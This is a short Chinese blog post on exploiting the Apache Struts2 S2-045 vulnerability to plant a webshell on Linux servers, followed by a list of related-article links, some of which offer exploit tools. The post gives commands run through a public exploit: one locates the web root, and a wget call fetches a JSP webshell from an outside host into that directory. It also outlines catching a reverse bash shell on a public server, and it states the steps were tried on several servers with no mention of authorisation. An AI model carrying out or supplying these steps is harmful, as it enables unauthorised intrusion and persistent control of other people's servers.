struts2 s2-45漏洞利用

最新推荐文章于 2024-05-31 18:19:08 发布
最新推荐文章于 2024-05-31 18:19:08 发布
阅读量2.8k 收藏
点赞数
分类专栏: Safe
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qzxdh/article/details/60867128
版权

网上放出了python版的struts2 s2-45漏洞利用exp,可执行win或linux命令。

实践了几个linux服务器,记录下linux下获取webshell过程。


访问web,随便挑一个图片文件名,如qzxdh.jpg,利用exp执行find / -name qzxdh.jpg,获取web物理路径。

利用wget http://qzxdh.com/jspshell.txt -O /webroot/jspshell.jsp,获取jspwebshell。


如有公网服务器,可在公网服务器上侦听端口,利用exp执行命令将目标的bash弹回。


qzxdh
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Struts2漏洞
2403_82795493的博客
02-20 2112
Struts 是Apache软件基金会(ASF)赞助的一个开源项目,通过采用JavaServlet/JSP技术,实现基于Java EEWeb应用的MVC设计模式的应用框架,Struts 2是Struts的下一代产品,是在 Struts 1和WebWork的技术基础上进行了合并的全新的Struts 2框架。Struts2框架广泛应用于政府、公安、交通、金融行业和运营商的网站建设,作为网站开发的底层模板使用。
简析struts2漏洞CVE-2017-5638,S02-45 (形成原理,解决方法)
chengyueshi2102的博客
03-08 552
简单说一下Struts2基于“commons-fileupload”组件实现文件上传的漏洞,漏洞编号CVE-2017-5638,S02-45. 1. 漏洞重现: 通过发包模拟器或其它你能修改请求头Content-Type字段的客户端,可以把Content-Type 修改成诸如h...
struts2漏洞工具_Struts2 漏洞集合_零开始黑客入门教程
最新发布
2401_84915584的博客
05-31 682
总结了一部分 Strtus2 漏洞,虽然现在这部分的漏洞很少了,但也是学习的一部分,收集的并不全面,后续会做
Struts2struts2的action,传参,获取Servlet,异常处理,国际化,文件上传下载,数据验证,标签库等)
Mr.Cao
10-26 277
目录 Struts2. 4 1. Struts2.5-环境搭建.... 4 1.1 导入包.... 4 1.2 入口配置.... 4 1.3 主配置.... 5 2. Struts入门.... 5 2.1 Struts类都以Action为后缀.... 5 2.2 编写Struts.xml 5 2.3 配置struts.xml的例子... 6 2.4 生成url 6 ...
python S2-45 漏洞利用工具
weixin_34246551的博客
03-11 120
初学python脚本,写个工具练练手。第一次写勿喷。呃...忘了截图了,补上了。 程序对于处理 JSON post 有些问题,其他地方还没发现有啥问题。 #coding:utf-8 import chardet import urllib2 import httplib from Tkinter import * from poster.encode imp...
Struts2漏洞 - Struts2-015 Struts2-016 Struts2-045
HAKUNAMATATATTA的博客
12-21 2377
Apache Struts是美国阿帕奇(Apache)软件基金会负责维护的一个开源项目,是一套用于创建企业级Java Web 应用的开源MVC框架,主要提供两个版本框架产品: Struts 1和Struts2Struts2是一个基于MVC设计模式的Web应用框架,它本质上相当于一个servlet,在MVC设计模式中,Struts2作为控制器(Controller)来建立模型与视图的数据交互。
Struts2 045漏洞S2-045漏洞利用工具python 视图版
03-07
Struts2 045漏洞S2-045漏洞利用工具python 视图版 执行python exp.py后 自动弹出对话框
Struts2-S2-029漏洞分析1
08-08
Struts2-S2-029漏洞是一个严重的问题,它涉及到OGNL(Object-Graph Navigation Language)表达式在Struts2框架中的不安全处理。此漏洞的根本原因是开发人员在处理OGNL表达式中的赋值操作时,错误地编写了判断条件,...
struts2反序列化漏洞,存在s2-005、s2-016、s2-016_3、s2-017
08-28
这些漏洞允许攻击者通过精心构造的输入,利用Struts2的内置机制执行任意代码,从而对系统造成严重危害。 首先,s2-005漏洞(CVE-2012-0881)是2012年发现的一个严重问题,它涉及到Struts2的OGNL(Object-Graph ...
S2-016漏洞利用工具
05-03
在提供的"压缩包子文件的文件名称列表"中,我们看到"S2-016漏洞利用工具.exe",这可能是一个用于检测或测试目标系统是否易受S2-016攻击的工具。使用这样的工具时,务必谨慎,因为它们通常具有潜在的破坏性。仅应在...
struts2 s2-045
03-22
Struts2 S2-045 是一个著名的安全漏洞,主要影响使用Apache Struts2框架开发的Web应用程序。这个漏洞是由于Struts2的核心组件存在的一个逻辑错误,导致了远程代码执行(RCE)的可能性,这使得攻击者可以完全控制受...
Struts 2 远程代码执行漏洞(s2-045\s2-046)修复所用到的包
03-23
1.严格过滤 Content-Type 、filename里的内容,严禁ognl表达式相关字段。 2.如果您使用基于Jakarta插件,请升级到Apache Struts 2.3.32或2.5.10.1版本。(强烈推荐) 3.升级到2.3.32所用到的jar包: freemarker-2.3.22.jar ognl-3.0.19.jar struts2-convention-plugin-2.3.32.jar struts2-core-2.3.32.jar struts2-spring-plugin-2.3.32.jar xwork-core-2.3.32.jar --来源 http://mvnrepository.com/artifact/org.apache.struts/struts2-spring-plugin/2.3.32
Struts2漏洞利用工具2019版 V2.3.zip
09-11
Struts2漏洞利用工具2019版 V2.3.zip
Struts2漏洞利用工具2017版
04-21
Struts2漏洞利用工具下载(已更新V1.8版) 2017-03-21:增加S2-046,官方发布S2-046和S2-045漏洞
struts2漏洞利用工具
07-03
Struts终极漏洞利用工具 Powered By 独孤城 Thanks to 峙酿君edwardz
struts2漏洞利用
agent_peakey的专栏
03-18 2986
struts2漏洞利用 1.      概念 Apache Struts2是一个适用于Java Web应用的开发框架,在企业Web应用市场广泛被使用。 该框架由于使用广泛,被安全人员研究较多,爆出了很多高危漏洞,官网上发布了很多安全问题修复方案:http://struts.apache.org/docs/security-bulletins.html,且由于表达式灵活,修复方式也很容易被绕过
Struts2远程代码执行漏洞复现
02-04 473
Struts2远程代码执行漏洞介绍、原理和复现,以及怎么使用工具检测。
Struts2漏洞利用原理
热门推荐
weixin_33810006的博客
04-12 1万+
概述: Struts2是apache项目下的一个web 框架,目前web框架中非常流行的都是mvc设计模式、经典例子例如:python的Django、Flask;java的ssm等。因为使用MVC设计模式,所以在框架内部处理用户数据流参数的事后就不可避免的存在数据在不同层次流转的问题。struts2作为java的一款成熟的web框架,自然也面临这个问题,于是struts2设计了一套OGNL的模式...
Struts2 S2-016上传webshell的需求分析
05-25
Struts2 S2-016漏洞是一种文件上传漏洞,攻击者可以通过该漏洞上传恶意代码(如WebShell)到目标服务器,并在服务器上执行该代码,造成严重的安全威胁。 为了成功利用该漏洞,攻击者需要满足以下条件: 1. 目标...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值